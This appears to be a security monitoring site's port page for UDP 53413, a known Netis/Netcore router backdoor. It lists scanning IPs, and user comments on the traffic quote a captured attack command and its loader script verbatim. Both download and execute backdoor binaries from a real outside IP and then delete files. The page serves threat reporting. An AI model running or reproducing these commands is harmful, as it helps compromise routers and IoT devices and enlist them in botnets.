Loading...
[get complete service list]
Top of page
Port Information
Protocol Service Name
tcp --- ---
Top IPs Scanning
Today Yesterday
3.144.120.14 (42)184.105.247.252 (39)
3.141.153.201 (28)184.105.247.238 (35)
3.17.206.73 (21)184.105.247.247 (30)
3.144.120.21 (21)64.62.156.48 (29)
65.49.1.102 (16)64.62.156.43 (26)
65.49.1.96 (15)64.62.156.41 (25)
18.218.94.172 (14)64.62.156.38 (24)
3.14.73.254 (14)64.62.156.40 (21)
64.62.156.83 (14)64.62.156.49 (21)
18.221.214.151 (14)64.62.156.44 (20)
Port diary mentions
URL
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413)
Top of page
User Comments
Submitted By Date
Comment
2024-07-22 12:13:35
This busybox command was sent to UDP socket: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * 8UsA.sh file tries to load and execute backdoor for 10 different architectures: #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
2016-08-01 00:23:46
The devices causing this traffic seem to be IoT devices (DVR's IPCAM's etc.), possibly part of LizzardStresser or another botnet based on it
2016-02-03 10:29:11
This appears to be an attack against netcore routers - udp port 53413. It attempts to run various busybox / shell commands.
Top of page
CVE Links
CVE # Description
Top of page